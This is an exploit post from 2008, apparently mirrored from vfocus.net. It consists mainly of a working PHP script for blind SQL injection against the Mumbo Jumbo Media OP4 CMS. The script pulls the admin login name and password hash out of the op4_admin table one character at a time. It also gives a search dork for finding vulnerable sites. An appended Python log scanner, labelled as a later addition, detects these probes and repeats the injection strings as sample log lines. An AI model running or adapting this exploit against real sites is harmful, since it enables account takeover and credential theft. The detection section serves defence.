Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit
Source: www.vfocus.net  Author: Lidloses  Published: 2008-04-14
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#   Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit    
#                                                            
#      Vulnerability discovered by: Lidloses_Auge            
#      Exploit coded by:            Lidloses_Auge
#      Greetz to:                   Free-Hack, GPM
#      Date:                        13.04.2008
#
###############################################################
#                                                            
#      Dork:  "mumbo jumbo media" + inurl:"index.php"
#      Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID]
#      Example for "http://www.site.com/cms/index.php?id=300"
#      => php '.$argv[0].' http://www.site.com/cms/ 300 1
#                                                            
###############################################################
');
if ($argc > 1) {
print_r('
');
   echo 'Searching for Admin: ';
   for($i=1; $i <= 50; $i++) {
      $temp1 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kennung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--');
      if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) {
         $adlen = $i;
         $i = 50;
      }
   }
   for($i=1; $i <= $adlen; $i++) {
      for($zahl=48; $zahl <= 122; $zahl++) {
         $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
         if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
            echo chr($zahl);
            $zahl = 122;
         }
         if ($zahl == 57) {
            $zahl = 96;
         }
      }
   }
print_r('
');
   echo 'Searching for Hash:  ';
   for($i=1; $i <= 32; $i++) {
      for($zahl=48; $zahl <= 102; $zahl++) {
         if ($check = 0) {
            $temp2 = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--');
            if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0) {
               $zahl = 97;
               $check = 1;
            }
         }
         $temp = file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((select+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
         if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
            echo chr($zahl);
            $zahl = 102;
         }
         if ($zahl == 57) {
            $zahl = 97;
         }
      }
      $check = 0;
   }
}
?>
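
A defender-side check for the request shape this script generates, as an added example that is not part of the original post: it scans web access logs for `index.php?id=` values that are not plain numbers and counts those carrying the `length((select` / `ascii(substring((select` probes seen above. The log format, the sample lines and the function name `scan` are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style; not real traffic.
SAMPLE_LOG = '''\
203.0.113.7 - - [13/Apr/2008:10:00:01 +0000] "GET /cms/index.php?id=300+and+length((select+kennung+from+op4_admin+where+id=1))=4-- HTTP/1.0" 200 812
203.0.113.7 - - [13/Apr/2008:10:00:02 +0000] "GET /cms/index.php?id=300+and+ascii(substring((select+kennung+from+op4_admin+where+id=1),1,1))=48-- HTTP/1.0" 200 812
203.0.113.7 - - [13/Apr/2008:10:00:02 +0000] "GET /cms/index.php?id=300+and+ascii(substring((select+passwort+from+op4_admin+where+id=1),1,1))=49-- HTTP/1.0" 200 812
198.51.100.20 - - [13/Apr/2008:10:00:03 +0000] "GET /cms/index.php?id=300 HTTP/1.1" 200 4096
198.51.100.21 - - [13/Apr/2008:10:00:04 +0000] "GET /cms/index.php?id=12&lang=de HTTP/1.1" 200 4096
'''

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Boolean probes wrapped around a subquery: length((select ...)) and
# ascii(substring((select ...),pos,1)), matched after URL decoding.
PROBE = re.compile(r'\b(?:length|ascii\s*\(\s*substr(?:ing)?)\s*\(\s*\(\s*select\b', re.I)

def scan(log_text):
    """Return {client: {"probes": n, "non_numeric": n}} for index.php?id= requests."""
    hits = defaultdict(lambda: {"probes": 0, "non_numeric": 0})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("index.php"):
            continue
        # parse_qs decodes '+' and %XX, so encoded variants are compared in clear text.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if value.isascii() and value.isdigit():
                continue  # a page ID such as 300 is the only expected form
            hits[client]["non_numeric"] += 1
            if PROBE.search(value):
                hits[client]["probes"] += 1
    return dict(hits)

if __name__ == "__main__":
    for client, counts in scan(SAMPLE_LOG).items():
        print(client, counts)
```

A client that sends dozens of such requests with only the position and comparison value changing matches the character-by-character loop in the script; the non-numeric count on its own is also worth alerting on, since the page ID is expected to be an integer.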


 